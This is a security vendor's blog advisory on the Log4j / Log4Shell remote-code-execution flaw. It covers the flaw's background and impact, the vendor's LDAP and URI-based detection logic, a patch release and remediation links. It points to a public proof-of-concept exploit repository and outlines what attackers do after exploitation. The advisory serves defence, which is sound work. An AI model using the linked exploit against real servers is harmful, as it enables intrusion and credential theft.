Note: this blog has been updated on December 20, 2021, and we will continue to make updates as more technical information becomes available

Exploit Background
The Log4j exploit is a vulnerability in an open source Apache logging framework that allows attackers to gain arbitrary execution abilities on an affected device. Used commonly in modern Java applications (even some non-enterprise applications like Minecraft), services are scrambling to defend against this vulnerability. Earliest evidence of this exploit was found December 1st, according to Cloudflare CEO Matthew Prince.

This vulnerability can be exploited through sending a single crafted string that is then logged by versions 2.0 and up of Log4J. Users on Twitter, Minecraft, and iCloud have been seen changing their usernames or posting chat messages that include the string, successfully gaining access. The exploit can also be used to read server environment variables, which can read static credentials in some cases without full remote code execution.

The situation with this exploit is currently ongoing as researchers continue to find affected applications and further holes in the logging framework. Some have dubbed this situation ‘Log4Shell’. More information on this CVE can be found here.

Impact
Currently, the Log4J vulnerability is causing a sharp uptick in traffic with the triggering string. Though most hosts are able to fight against it by layering security measures, discontinuing use of some Java applications, or dropping/banning traffic, others are scrambling to review their assets for any inclusion of Log4J or components using the framework.

An arbitrary execution can result in catastrophic damage, as it allows for near full access to all server resources. After successfully triggering the vulnerability, attackers can upload scripts to the server that can retrieve files, use the server for DDoS attacks, monitor the server, and more.

Needless to say, this sort of vulnerability has been classified as a Critical or 10.0 severity on CVSS version 3 and is highly dangerous. As a result, we have put together some automation and this release to help our customers.

Automation Logic

  • Detection
    In response to this vulnerability, we have implemented some logic to detect it in customer instances. This detection first searches out items using LDAP and certain ports associated with LDAP. It will also search for unusual URIs (which would find instances of attempts using the custom string). After assigning scoring and sorting by least frequent/unusual hosts, cases are created for triage.

  • New Release
    In our new release, Milestone 86, we’ve implemented the Apache-recommended fix to prevent attempts against our instances. We’ve also done thorough checks of customer instances and done reviews of known customer assets for notifications.

    The Apache recommendation, though followed for this article, has since been invalidated by Apache and continues to be vulnerable. A later release is in progress to further patch issues related to Log4J. Please keep an eye on our latest releases page for details.

Remediation
Within LogicHub, please ensure you keep up on our latest instance version releases as they become available. We will continue to monitor for additional instances of this activity and new attacks under the Log4j vulnerability umbrella.

Please also follow the advice given under the Apache remediation page for devices that are not running LogicHub instances. Please see Sources in this release for more information.

Relevant Sources and Further Reading
Watch LogicHub’s coverage of Log4J Library Zero-Day on LogicHub’s Monthly Security RoundUp.

Read LogicHub's December’s Monthly Security Roundup to get more information about other threats we’re finding in the wild.

Join us on the 15th of each month @ 10:00am PT/ 1:00pm ET for LogicHub’s Monthly Security RoundUp on the LogicHub webinar channel.

Proof of Concept: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Demo from Marcus Hutchins (MalwareTechBlog): https://www.youtube.com/watch?v=0-abhd-CLwQ

Article from Wired (for a user-friendly understanding of how this is affecting the internet as a whole): https://www.wired.com/story/log4j-flaw-hacking-internet/

LogicHub Milestone 86 Release Notes: https://help.logichub.com/changelog/milestone-86#fix-for-log4j---cve-2021-44228

Apache Logging Security Vulnerabilities (includes mitigations and other information): https://logging.apache.org/log4j/2.x/security.html

Blog

Related Posts

May 20, 2022 Willy Leichter

Automating Threat Detection: Three Case Studies

Demystifying the technology with case studies of AI security in action Many automation tools, such...

Learn More

May 17, 2022 Willy Leichter

It's Time to Put AI to Work in Security

While we’ve been talking about and imagining artificial intelligence for years, it only has...

Learn More

May 15, 2022 Tessa Mishoe

LogicHub Security RoundUp: May 2022

Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be...

Learn More

May 9, 2022 Tessa Mishoe

Bad Luck: BlackCat Ransomware Bulletin

Blackcat Ransomware On April 19th of 2022, the FBI Cyber Division released a flash bulletin...

Learn More

May 6, 2022 Kumar Saurabh

Let Humans Be Humans and AI Be AI

LogicHub’s unique decision automation technology can build clients the ultimate security playbook...

Learn More

May 3, 2022 Kumar Saurabh

How to Build a Threat Detection Playbook In 15 Minutes or Less

Automating a threat-hunting playbook with the help of AI Many threat-hunting playbooks we build for...

Learn More

April 29, 2022 Tessa Mishoe

Integrating Better: What Can Integrations Do For Me?

Introduction Within the realm of security, there are many different toolsets and opinions on what...

Learn More

April 27, 2022 Willy Leichter

Beyond No-Code: Using AI for Guided Security Automation

SOAR Playbooks Outside of football, the term “playbook” is well understood by a relatively small...

Learn More

April 21, 2022 Willy Leichter

Goodbye Lonely SIEM, Hello MDR

When updating your systems from a pure Security Information Event Management (SIEM), choosing the...

Learn More

April 15, 2022 Tessa Mishoe

LogicHub Security Roundup: April 2022

Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be...

Learn More